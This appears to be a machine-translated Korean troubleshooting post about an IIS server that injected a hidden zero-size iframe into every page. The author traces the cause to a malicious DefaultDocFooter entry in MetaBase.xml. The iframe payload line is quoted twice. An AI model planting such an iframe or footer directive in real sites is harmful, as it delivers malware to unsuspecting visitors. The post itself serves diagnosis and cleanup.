서버가 거의 모든 웹사이트를 열면 HTML 페이지도 나타납니다.
<iframe src=" http://xxxdfsfd/web.htm " 높이=0 너비=0></iframe>
이러한 스타일의 코드 중 일부는 머리 부분에 있고 일부는 꼬리 부분에 있습니다. 바이러스 백신 소프트웨어는 열릴 때 바이러스를 보고합니다.
HTML 또는 ASP PHP 페이지를 열 때 소스 코드에서 이 코드를 찾을 수 없습니다.
이유 분석
첫째, ARP 악성 코드를 의심했으며 ARP 방지 도구를 사용했지만 arp 스푸핑을 발견하지 못했습니다.
게다가 arp 스푸핑은 일반적으로 매번 코드에 삽입되는 것이 아니라 가끔, 가끔씩 삽입되는 경우가 많습니다.
또한 http://127.0.0.1 또는 http://localhost를 사용하여 액세스할 때도 이 코드를 찾을 수 있습니다.
arp 스푸핑 가능성이 제거됩니다.
그러다가 JS나 다른 포함된 파일이 변조된 것이 아닐까 생각했는데, 검색해보니 수정된 페이지가 발견되지 않았습니다.새로 생성된 HTML 페이지를 탐색해도 이 코드가 삽입되므로 IIS를 통해서만 끊길 수 있습니다. .
iis 데이터를 백업한 후 iis를 재설치했더니, 백업한 iis를 복원한 후 코드가 사라졌습니다.
주의 깊게 검색한 결과 IIS 구성 파일에 문제가 있는 것으로 나타났습니다. 구성 파일을 열었을 때 해당 코드 조각을 찾지 못했습니다.
특정 파일이 호출될 가능성이 매우 높습니다. 이를 어떻게 확인할 수 있나요? 문득 그 유명한 파일몬이 생각났습니다.
로컬에서 하나를 다운로드하여 서버에 업로드했습니다. Filemon을 열었습니다. 쓸데없는 데이터가 너무 많아서 걸러냈습니다.
iis 프로세스만 남아있고, 아직도 많은 분들이 서버에서 사이트를 방문하고 있는 것 같습니다.
모든 사이트를 닫고 테스트 사이트 anky를 구축합니다. 디렉토리는 D:www이고 아래에 빈 페이지 test.htm을 만듭니다.
이 페이지를 방문하면 코드가 삽입되어 있으며 Filemon을 살펴보십시오. C:Inetpubwwwrootiisstart.htm을 읽는 방법이 이상합니다.
C:Inetpubwwwrootiisstart.htm을 열고 다음이 있는지 확인합니다.
<iframe src=" http://xxxdfsfd/web.htm " 높이=0 너비=0></iframe>
test.htm 접속시에는 코드를 삭제하고 비워두시면 C:Inetpubwwwrootiisstart.htm을 삭제하신 후 다시 접속하시는 것이 정상입니다.
test.htm에서 "데이터 바닥글 파일 읽기 오류" 문제가 나타나는 곳입니다.
이 파일.
C:Inetpubwwwrootiisstart.htm을 지우면 정상입니다. 어떻게 해야 합니까? 문제를 해결하려면 당연히 플러그를 뽑아야 합니다.
계속하다
확장 프로그램으로 인해 발생한 것일 수도 있나요? 확장 프로그램에서 확인해보니 모든 것이 정상입니다.
물론 ISAPI를 통한 트로이 목마도 있습니다.
많은 고민 끝에 마침내 구성 파일에 문제가 있다는 것을 느꼈습니다.
%windir%system32inetsrvMetaBase.xml에 있는 구성 파일을 엽니다.
메모장으로 열고 iisstart.htm을 검색해서 한 줄을 찾아요. 처음에는 기본 사이트인 줄 알았는데, 나중에는 틀린 줄 알았어요.
기본 사이트가 삭제되었습니다. 이 코드를 자세히 살펴보세요.
DefaultDocFooter="파일:C:Inetpubwwwrootiisstart.htm"
이 줄을 삭제하면 문제가 완전히 해결됩니다.